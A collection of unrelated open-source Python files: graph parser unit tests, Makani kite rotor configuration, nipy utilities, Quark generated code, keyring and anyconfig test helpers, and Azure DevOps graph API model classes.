(EDGE, "a", "b", {})
])
self.assertEqual(g.nodes, [])
self.assertEqual(g.edges, [Edge("a", "b", {})])
self.assertEqual(g.attrs, {})
def test_graph_with_one_attribute(self):
g = Graph([
(ATTR, "foo", "1")
])
self.assertEqual(g.nodes, [])
self.assertEqual(g.edges, [])
self.assertEqual(g.attrs, {"foo": "1"})
def test_graph_with_attributes(self):
g = Graph([
(ATTR, "foo", "1"),
(ATTR, "title", "Testing Attrs"),
(NODE, "a", {"color": "green"}),
(NODE, "c", {}),
(NODE, "b", {"label": "Beta!"}),
(EDGE, "b", "c", {}),
(EDGE, "a", "b", {"color": "blue"}),
(ATTR, "bar", "true")
])
self.assertEqual(g.nodes, [Node("a", {"color": "green"}),
Node("c", {}),
Node("b", {"label": "Beta!"})])
self.assertEqual(g.edges, [Edge("b", "c", {}),
Edge("a", "b", {"color": "blue"})])
self.assertEqual(g.attrs, {
"foo": "1",
"title": "Testing Attrs",
"bar": "true"
})
def test_malformed_graph(self):
with self.assertRaises(TypeError) as err:
Graph(1)
self.assertEqual(type(err.exception), TypeError)
self.assertEqual(err.exception.args[0], "Graph data malformed")
with self.assertRaises(TypeError) as err:
Graph("problematic")
self.assertEqual(type(err.exception), TypeError)
self.assertEqual(err.exception.args[0], "Graph data malformed")
def test_malformed_graph_item(self):
with self.assertRaises(TypeError) as err:
Graph([()])
self.assertEqual(type(err.exception), TypeError)
self.assertEqual(err.exception.args[0], "Graph item incomplete")
with self.assertRaises(TypeError) as err:
Graph([(ATTR, )])
self.assertEqual(type(err.exception), TypeError)
self.assertEqual(err.exception.args[0], "Graph item incomplete")
def test_malformed_attr(self):
with self.assertRaises(ValueError) as err:
Graph([(ATTR, 1, 2, 3)])
self.assertEqual(type(err.exception), ValueError)
self.assertEqual(err.exception.args[0], "Attribute is malformed")
def test_malformed_node(self):
with self.assertRaises(ValueError) as err:
Graph([(NODE, 1, 2, 3)])
self.assertEqual(type(err.exception), ValueError)
self.assertEqual(err.exception.args[0], "Node is malformed")
def test_malformed_EDGE(self):
with self.assertRaises(ValueError) as err:
Graph([(EDGE, 1, 2)])
self.assertEqual(type(err.exception), ValueError)
self.assertEqual(err.exception.args[0], "Edge is malformed")
def test_unknown_item(self):
with self.assertRaises(ValueError) as err:
Graph([(99, 1, 2)])
self.assertEqual(type(err.exception), ValueError)
self.assertEqual(err.exception.args[0], "Unknown item")
|
config/m600/rotors.py | leozz37/makani | 1,178 | 12634956 | # Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Rotor parameters."""
from makani.config import mconfig
from makani.control import system_types as m
import numpy as np
@mconfig.Config(deps={
'flight_plan': 'common.flight_plan',
'propellers': 'prop.propellers',
'wing_serial': 'common.wing_serial',
})
def MakeParams(params):
# Motor rotor moment-of-inertia [kg-m^2].
yasa_rotor_moment_of_inertia = 0.33
bottom_row = [m.kMotorSbo, m.kMotorSbi, m.kMotorPbi, m.kMotorPbo]
# Assign propeller versions.
propeller_versions = [None for _ in range(m.kNumMotors)]
if params['wing_serial'] == m.kWingSerial01:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] in [m.kWingSerial04Crosswind]:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] == m.kWingSerial04Hover:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] in [m.kWingSerial05Crosswind]:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] == m.kWingSerial05Hover:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] in [m.kWingSerial06Crosswind]:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] == m.kWingSerial06Hover:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] in [m.kWingSerial07Crosswind]:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSti] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
elif params['wing_serial'] == m.kWingSerial07Hover:
propeller_versions[m.kMotorSbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorSbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbi] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPbo] = m.kPropVersionRev4NegativeX
propeller_versions[m.kMotorPto] = m.kPropVersionRev4PositiveX
propeller_versions[m.kMotorPti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSti] = m.kPropVersionRev1Trimmed
propeller_versions[m.kMotorSto] = m.kPropVersionRev4PositiveX
else:
assert False, 'Unknown wing serial.'
rotors = [None for _ in range(m.kNumMotors)]
for r in range(m.kNumMotors):
rotors[r] = {
# Normal vector to the propeller plane.
'axis': [np.cos(np.deg2rad(3.0)), 0.0, np.sin(np.deg2rad(3.0))],
# Direction cosine matrix from body to rotor frame.
'dcm_b2r': {'d': [[np.cos(np.deg2rad(-3.0)), 0.0,
np.sin(np.deg2rad(-3.0))],
[0.0, 1.0, 0.0],
[-np.sin(np.deg2rad(-3.0)), 0.0,
np.cos(np.deg2rad(-3.0))]]},
# Local pressure coefficient [#] at the rotor position. The
# pressure coefficient, C_P, is related to local airspeed
# through the equation:
#
# C_P = 1 - (v / v_freestream)^2
#
# There is a significant difference in airspeeds between the top
# and bottom propellers caused by the lift of the wing. These
# pressure coefficients are derived from CFD with the slatted
# kite at 4 deg alpha (https://goo.gl/yfkJJS)
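        # For these coefficients, the local airspeed works out to roughly
        # 0.92 * v_freestream for the bottom row and 1.07 * v_freestream
        # for the top row.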
'local_pressure_coeff': 0.1448 if r in bottom_row else -0.1501,
# The rotor direction, diameter [m] and moment of inertia [kg
# m^2] are set from the corresponding propeller's information.
'version': propeller_versions[r],
'dir': params['propellers'][propeller_versions[r]]['dir'],
'D': params['propellers'][propeller_versions[r]]['D'],
'I': (yasa_rotor_moment_of_inertia +
params['propellers'][propeller_versions[r]]['I']),
}
    # We check that the rotor axis is normalized, because it is used
# to determine the force-moment conversion matrix in
# rotor_control.py.
assert abs(np.linalg.norm(rotors[r]['axis']) - 1.0) < 1e-9
# Rotor positions [m].
#
# Updated on 2015-01-22 based on the COM positions given by the Mass
# and Balance spreadsheet.
rotors[m.kMotorSbo]['pos'] = [1.613, 3.639, 1.597]
rotors[m.kMotorSbi]['pos'] = [1.613, 1.213, 1.597]
rotors[m.kMotorPbi]['pos'] = [1.613, -1.213, 1.597]
rotors[m.kMotorPbo]['pos'] = [1.613, -3.639, 1.597]
rotors[m.kMotorPto]['pos'] = [1.960, -3.639, -1.216]
rotors[m.kMotorPti]['pos'] = [1.960, -1.213, -1.216]
rotors[m.kMotorSti]['pos'] = [1.960, 1.213, -1.216]
rotors[m.kMotorSto]['pos'] = [1.960, 3.639, -1.216]
return rotors
|
tests/data/expected/parser/openapi/openapi_parser_parse_any/output.py | languitar/datamodel-code-generator | 891 | 12634960 | from __future__ import annotations
from typing import Any, Optional
from pydantic import BaseModel
class Item(BaseModel):
bar: Optional[Any] = None
foo: str
|
nipy/utils/utilities.py | bpinsard/nipy | 236 | 12634962 | <reponame>bpinsard/nipy
""" Collection of utility functions and classes
Some of these come from the matplotlib ``cbook`` module with thanks.
"""
from functools import reduce
from operator import mul
def is_iterable(obj):
""" Return True if `obj` is iterable
"""
try:
iter(obj)
except TypeError:
return False
return True
def is_numlike(obj):
""" Return True if `obj` looks like a number
"""
try:
obj + 1
except:
return False
return True
def seq_prod(seq, initial=1):
""" General product of sequence elements
Parameters
----------
seq : sequence
Iterable of values to multiply.
initial : object, optional
Initial value
Returns
-------
prod : object
Result of ``initial * seq[0] * seq[1] .. ``.
"""
return reduce(mul, seq, initial)
|
quarkc/test/ffi/expected/py/signatures/generics/pkg/__init__.py | datawire/quark | 112 | 12634971 | <filename>quarkc/test/ffi/expected/py/signatures/generics/pkg/__init__.py
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from builtins import str as unicode
from quark_runtime import *
_lazyImport.plug("generics.pkg")
import quark.reflect
class Foo(object):
def foo(self):
return _cast(None, lambda: T)
def get(self):
raise NotImplementedError('`Foo.get` is an abstract method')
Foo.generics_pkg_Foo_quark_Object__ref = None
class StringFoo(_QObject):
def _init(self):
pass
def __init__(self): self._init()
def get(self):
return _cast(None, lambda: unicode)
def _getClass(self):
return u"generics.pkg.StringFoo"
def _getField(self, name):
return None
def _setField(self, name, value):
pass
def foo(self):
return _cast(None, lambda: unicode)
StringFoo.generics_pkg_StringFoo_ref = None
class Box(_QObject):
def _init(self):
self.contents = None
def __init__(self, contents):
self._init()
def _getClass(self):
return u"generics.pkg.Box<quark.Object>"
def _getField(self, name):
if ((name) == (u"contents")):
return (self).contents
return None
def _setField(self, name, value):
if ((name) == (u"contents")):
(self).contents = _cast(value, lambda: T)
class StringBox(Box):
def _init(self):
Box._init(self)
def __init__(self, contents):
super(StringBox, self).__init__(contents);
def _getClass(self):
return u"generics.pkg.StringBox"
def _getField(self, name):
if ((name) == (u"contents")):
return (self).contents
return None
def _setField(self, name, value):
if ((name) == (u"contents")):
(self).contents = _cast(value, lambda: unicode)
StringBox.generics_pkg_Box_quark_String__ref = None
StringBox.generics_pkg_StringBox_ref = None
def _lazy_import_quark_ffi_signatures_md():
import quark_ffi_signatures_md
globals().update(locals())
_lazyImport("import quark_ffi_signatures_md", _lazy_import_quark_ffi_signatures_md)
_lazyImport.pump("generics.pkg")
|
tests/test_core.py | kianmeng/keyring | 834 | 12634975 | <reponame>kianmeng/keyring
import keyring.core
def test_init_recommended(monkeypatch):
"""
Test filtering of backends to recommended ones (#117, #423).
"""
monkeypatch.setattr(keyring.core, 'set_keyring', lambda kr: None)
keyring.core.init_backend(keyring.core.recommended)
|
tests/base/__init__.py | ssato/python-anyconfig | 213 | 12634987 | <reponame>ssato/python-anyconfig
#
# Copyright (C) 2021 <NAME> <<EMAIL>>
# SPDX-License-Identifier: MIT
#
r"""Common test Utility functions, constants and global variables, etc.
"""
from .constants import TESTS_DIR, RES_DIR, NULL_CNTNR
from .collector import TDataCollector
from .datatypes import TData
from .utils import (
load_data, load_datasets_from_dir, maybe_data_path
)
__all__ = [
'TESTS_DIR', 'RES_DIR', 'NULL_CNTNR',
'TDataCollector',
'TData',
'load_data', 'load_datasets_from_dir', 'maybe_data_path'
]
# vim:sw=4:ts=4:et:
|
azure-devops/azext_devops/devops_sdk/v5_1/graph/models.py | keithlemon/azure-devops-cli-extension | 326 | 12635008 | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest.serialization import Model
class Avatar(Model):
"""
:param is_auto_generated:
:type is_auto_generated: bool
:param size:
:type size: object
:param time_stamp:
:type time_stamp: datetime
:param value:
:type value: str
"""
_attribute_map = {
'is_auto_generated': {'key': 'isAutoGenerated', 'type': 'bool'},
'size': {'key': 'size', 'type': 'object'},
'time_stamp': {'key': 'timeStamp', 'type': 'iso-8601'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, is_auto_generated=None, size=None, time_stamp=None, value=None):
super(Avatar, self).__init__()
self.is_auto_generated = is_auto_generated
self.size = size
self.time_stamp = time_stamp
self.value = value
class GraphCachePolicies(Model):
"""
:param cache_size: Size of the cache
:type cache_size: int
"""
_attribute_map = {
'cache_size': {'key': 'cacheSize', 'type': 'int'}
}
def __init__(self, cache_size=None):
super(GraphCachePolicies, self).__init__()
self.cache_size = cache_size
class GraphDescriptorResult(Model):
"""
Subject descriptor of a Graph entity
:param _links: This field contains zero or more interesting links about the graph descriptor. These links may be invoked to obtain additional relationships or more detailed information about this graph descriptor.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param value:
:type value: :class:`str <azure.devops.v5_1.graph.models.str>`
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, _links=None, value=None):
super(GraphDescriptorResult, self).__init__()
self._links = _links
self.value = value
class GraphFederatedProviderData(Model):
"""
Represents a set of data used to communicate with a federated provider on behalf of a particular user.
:param access_token: The access token that can be used to communicated with the federated provider on behalf on the target identity, if we were able to successfully acquire one, otherwise <code>null</code>, if we were not.
:type access_token: str
:param provider_name: The name of the federated provider, e.g. "github.com".
:type provider_name: str
:param subject_descriptor: The descriptor of the graph subject to which this federated provider data corresponds.
:type subject_descriptor: str
:param version: The version number of this federated provider data, which corresponds to when it was last updated. Can be used to prevent returning stale provider data from the cache when the caller is aware of a newer version, such as to prevent local cache poisoning from a remote cache or store. This is the app layer equivalent of the data layer sequence ID.
:type version: long
"""
_attribute_map = {
'access_token': {'key': 'accessToken', 'type': 'str'},
'provider_name': {'key': 'providerName', 'type': 'str'},
'subject_descriptor': {'key': 'subjectDescriptor', 'type': 'str'},
'version': {'key': 'version', 'type': 'long'}
}
def __init__(self, access_token=None, provider_name=None, subject_descriptor=None, version=None):
super(GraphFederatedProviderData, self).__init__()
self.access_token = access_token
self.provider_name = provider_name
self.subject_descriptor = subject_descriptor
self.version = version
class GraphGroupCreationContext(Model):
"""
Do not attempt to use this type to create a new group. This type does not contain sufficient fields to create a new group.
:param storage_key: Optional: If provided, we will use this identifier for the storage key of the created group
:type storage_key: str
"""
_attribute_map = {
'storage_key': {'key': 'storageKey', 'type': 'str'}
}
def __init__(self, storage_key=None):
super(GraphGroupCreationContext, self).__init__()
self.storage_key = storage_key
class GraphMembership(Model):
"""
Relationship between a container and a member
:param _links: This field contains zero or more interesting links about the graph membership. These links may be invoked to obtain additional relationships or more detailed information about this graph membership.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param container_descriptor:
:type container_descriptor: str
:param member_descriptor:
:type member_descriptor: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'container_descriptor': {'key': 'containerDescriptor', 'type': 'str'},
'member_descriptor': {'key': 'memberDescriptor', 'type': 'str'}
}
def __init__(self, _links=None, container_descriptor=None, member_descriptor=None):
super(GraphMembership, self).__init__()
self._links = _links
self.container_descriptor = container_descriptor
self.member_descriptor = member_descriptor
class GraphMembershipState(Model):
"""
Status of a Graph membership (active/inactive)
:param _links: This field contains zero or more interesting links about the graph membership state. These links may be invoked to obtain additional relationships or more detailed information about this graph membership state.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param active: When true, the membership is active
:type active: bool
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'active': {'key': 'active', 'type': 'bool'}
}
def __init__(self, _links=None, active=None):
super(GraphMembershipState, self).__init__()
self._links = _links
self.active = active
class GraphMembershipTraversal(Model):
"""
:param incompleteness_reason: Reason why the subject could not be traversed completely
:type incompleteness_reason: str
:param is_complete: When true, the subject is traversed completely
:type is_complete: bool
:param subject_descriptor: The traversed subject descriptor
:type subject_descriptor: :class:`str <azure.devops.v5_1.graph.models.str>`
:param traversed_subject_ids: Subject descriptor ids of the traversed members
:type traversed_subject_ids: list of str
:param traversed_subjects: Subject descriptors of the traversed members
:type traversed_subjects: list of :class:`str <azure.devops.v5_1.graph.models.str>`
"""
_attribute_map = {
'incompleteness_reason': {'key': 'incompletenessReason', 'type': 'str'},
'is_complete': {'key': 'isComplete', 'type': 'bool'},
'subject_descriptor': {'key': 'subjectDescriptor', 'type': 'str'},
'traversed_subject_ids': {'key': 'traversedSubjectIds', 'type': '[str]'},
'traversed_subjects': {'key': 'traversedSubjects', 'type': '[str]'}
}
def __init__(self, incompleteness_reason=None, is_complete=None, subject_descriptor=None, traversed_subject_ids=None, traversed_subjects=None):
super(GraphMembershipTraversal, self).__init__()
self.incompleteness_reason = incompleteness_reason
self.is_complete = is_complete
self.subject_descriptor = subject_descriptor
self.traversed_subject_ids = traversed_subject_ids
self.traversed_subjects = traversed_subjects
class GraphProviderInfo(Model):
"""
Who is the provider for this user and what is the identifier and domain that is used to uniquely identify the user.
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param domain: This represents the name of the container of origin for a graph member. (For MSA this is "Windows Live ID", for AAD the tenantID of the directory.)
:type domain: str
:param origin: The type of source provider for the origin identifier (ex: "aad", "msa")
:type origin: str
:param origin_id: The unique identifier from the system of origin. (For MSA this is the PUID in hex notation, for AAD this is the object id.)
:type origin_id: str
"""
_attribute_map = {
'descriptor': {'key': 'descriptor', 'type': 'str'},
'domain': {'key': 'domain', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'}
}
def __init__(self, descriptor=None, domain=None, origin=None, origin_id=None):
super(GraphProviderInfo, self).__init__()
self.descriptor = descriptor
self.domain = domain
self.origin = origin
self.origin_id = origin_id
class GraphScopeCreationContext(Model):
"""
This type is the subset of fields that can be provided by the user to create a Vsts scope. Scope creation is currently limited to internal back-compat scenarios. End users that attempt to create a scope with this API will fail.
:param admin_group_description: Set this field to override the default description of this scope's admin group.
:type admin_group_description: str
:param admin_group_name: All scopes have an Administrator Group that controls access to the contents of the scope. Set this field to use a non-default group name for that administrators group.
:type admin_group_name: str
:param creator_id: Set this optional field if this scope is created on behalf of a user other than the user making the request. This should be the Id of the user that is not the requester.
:type creator_id: str
:param name: The scope must be provided with a unique name within the parent scope. This means the created scope can have a parent or child with the same name, but no siblings with the same name.
:type name: str
:param scope_type: The type of scope being created.
:type scope_type: object
:param storage_key: An optional ID that uniquely represents the scope within its parent scope. If this parameter is not provided, Vsts will generate one automatically.
:type storage_key: str
"""
_attribute_map = {
'admin_group_description': {'key': 'adminGroupDescription', 'type': 'str'},
'admin_group_name': {'key': 'adminGroupName', 'type': 'str'},
'creator_id': {'key': 'creatorId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'scope_type': {'key': 'scopeType', 'type': 'object'},
'storage_key': {'key': 'storageKey', 'type': 'str'}
}
def __init__(self, admin_group_description=None, admin_group_name=None, creator_id=None, name=None, scope_type=None, storage_key=None):
super(GraphScopeCreationContext, self).__init__()
self.admin_group_description = admin_group_description
self.admin_group_name = admin_group_name
self.creator_id = creator_id
self.name = name
self.scope_type = scope_type
self.storage_key = storage_key
class GraphStorageKeyResult(Model):
"""
Storage key of a Graph entity
:param _links: This field contains zero or more interesting links about the graph storage key. These links may be invoked to obtain additional relationships or more detailed information about this graph storage key.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param value:
:type value: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'value': {'key': 'value', 'type': 'str'}
}
def __init__(self, _links=None, value=None):
super(GraphStorageKeyResult, self).__init__()
self._links = _links
self.value = value
class GraphSubjectBase(Model):
"""
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None):
super(GraphSubjectBase, self).__init__()
self._links = _links
self.descriptor = descriptor
self.display_name = display_name
self.url = url
class GraphSubjectLookup(Model):
"""
Batching of subjects to lookup using the Graph API
:param lookup_keys:
:type lookup_keys: list of :class:`GraphSubjectLookupKey <azure.devops.v5_1.graph.models.GraphSubjectLookupKey>`
"""
_attribute_map = {
'lookup_keys': {'key': 'lookupKeys', 'type': '[GraphSubjectLookupKey]'}
}
def __init__(self, lookup_keys=None):
super(GraphSubjectLookup, self).__init__()
self.lookup_keys = lookup_keys
class GraphSubjectLookupKey(Model):
"""
:param descriptor:
:type descriptor: :class:`str <azure.devops.v5_1.graph.models.str>`
"""
_attribute_map = {
'descriptor': {'key': 'descriptor', 'type': 'str'}
}
def __init__(self, descriptor=None):
super(GraphSubjectLookupKey, self).__init__()
self.descriptor = descriptor
class GraphUserCreationContext(Model):
"""
Do not attempt to use this type to create a new user. Use one of the subclasses instead. This type does not contain sufficient fields to create a new user.
:param storage_key: Optional: If provided, we will use this identifier for the storage key of the created user
:type storage_key: str
"""
_attribute_map = {
'storage_key': {'key': 'storageKey', 'type': 'str'}
}
def __init__(self, storage_key=None):
super(GraphUserCreationContext, self).__init__()
self.storage_key = storage_key
class GraphUserUpdateContext(Model):
"""
Do not attempt to use this type to update a user. Use one of the subclasses instead. This type does not contain sufficient fields to create a new user.
:param storage_key: Storage key should not be specified when updating a user
:type storage_key: str
"""
_attribute_map = {
'storage_key': {'key': 'storageKey', 'type': 'str'}
}
def __init__(self, storage_key=None):
super(GraphUserUpdateContext, self).__init__()
self.storage_key = storage_key
class JsonPatchOperation(Model):
"""
The JSON model for a JSON Patch operation
:param from_: The path to copy from for the Move/Copy operation.
:type from_: str
:param op: The patch operation
:type op: object
:param path: The path for the operation. In the case of an array, a zero based index can be used to specify the position in the array (e.g. /biscuits/0/name). The "-" character can be used instead of an index to insert at the end of the array (e.g. /biscuits/-).
:type path: str
:param value: The value for the operation. This is either a primitive or a JToken.
:type value: object
"""
_attribute_map = {
'from_': {'key': 'from', 'type': 'str'},
'op': {'key': 'op', 'type': 'object'},
'path': {'key': 'path', 'type': 'str'},
'value': {'key': 'value', 'type': 'object'}
}
def __init__(self, from_=None, op=None, path=None, value=None):
super(JsonPatchOperation, self).__init__()
self.from_ = from_
self.op = op
self.path = path
self.value = value
class PagedGraphGroups(Model):
"""
:param continuation_token: This will be non-null if there is another page of data. There will never be more than one continuation token returned by a request.
:type continuation_token: list of str
:param graph_groups: The enumerable list of groups found within a page.
:type graph_groups: list of :class:`GraphGroup <azure.devops.v5_1.graph.models.GraphGroup>`
"""
_attribute_map = {
'continuation_token': {'key': 'continuationToken', 'type': '[str]'},
'graph_groups': {'key': 'graphGroups', 'type': '[GraphGroup]'}
}
def __init__(self, continuation_token=None, graph_groups=None):
super(PagedGraphGroups, self).__init__()
self.continuation_token = continuation_token
self.graph_groups = graph_groups
class PagedGraphUsers(Model):
"""
:param continuation_token: This will be non-null if there is another page of data. There will never be more than one continuation token returned by a request.
:type continuation_token: list of str
:param graph_users: The enumerable set of users found within a page.
:type graph_users: list of :class:`GraphUser <azure.devops.v5_1.graph.models.GraphUser>`
"""
_attribute_map = {
'continuation_token': {'key': 'continuationToken', 'type': '[str]'},
'graph_users': {'key': 'graphUsers', 'type': '[GraphUser]'}
}
def __init__(self, continuation_token=None, graph_users=None):
super(PagedGraphUsers, self).__init__()
self.continuation_token = continuation_token
self.graph_users = graph_users
class ReferenceLinks(Model):
"""
The class to represent a collection of REST reference links.
:param links: The readonly view of the links. Because Reference links are readonly, we only want to expose them as read only.
:type links: dict
"""
_attribute_map = {
'links': {'key': 'links', 'type': '{object}'}
}
def __init__(self, links=None):
super(ReferenceLinks, self).__init__()
self.links = links
class GraphSubject(GraphSubjectBase):
"""
Top-level graph entity
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
:type _links: :class:`ReferenceLinks <azure.devops.v5_1.graph.models.ReferenceLinks>`
:param descriptor: The descriptor is the primary way to reference the graph subject while the system is running. This field will uniquely identify the same graph subject across both Accounts and Organizations.
:type descriptor: str
:param display_name: This is the non-unique display name of the graph subject. To change this field, you must alter its value in the source provider.
:type display_name: str
:param url: This url is the full route to the source resource of this graph subject.
:type url: str
:param legacy_descriptor: [Internal Use Only] The legacy descriptor is here in case you need to access old version IMS using identity descriptor.
:type legacy_descriptor: str
:param origin: The type of source provider for the origin identifier (ex:AD, AAD, MSA)
:type origin: str
:param origin_id: The unique identifier from the system of origin. Typically a sid, object id or Guid. Linking and unlinking operations can cause this value to change for a user because the user is now backed by a different provider and has a different unique id in the new provider.
:type origin_id: str
:param subject_kind: This field identifies the type of the graph subject (ex: Group, Scope, User).
:type subject_kind: str
"""
_attribute_map = {
'_links': {'key': '_links', 'type': 'ReferenceLinks'},
'descriptor': {'key': 'descriptor', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'url': {'key': 'url', 'type': 'str'},
'legacy_descriptor': {'key': 'legacyDescriptor', 'type': 'str'},
'origin': {'key': 'origin', 'type': 'str'},
'origin_id': {'key': 'originId', 'type': 'str'},
'subject_kind': {'key': 'subjectKind', 'type': 'str'}
}
def __init__(self, _links=None, descriptor=None, display_name=None, url=None, legacy_descriptor=None, origin=None, origin_id=None, subject_kind=None):
super(GraphSubject, self).__init__(_links=_links, descriptor=descriptor, display_name=display_name, url=url)
self.legacy_descriptor = legacy_descriptor
self.origin = origin
self.origin_id = origin_id
self.subject_kind = subject_kind
class GraphMember(GraphSubject):
"""
:param _links: This field contains zero or more interesting links about the graph subject. These links may be invoked to obtain additional relationships or more detailed information about this graph subject.
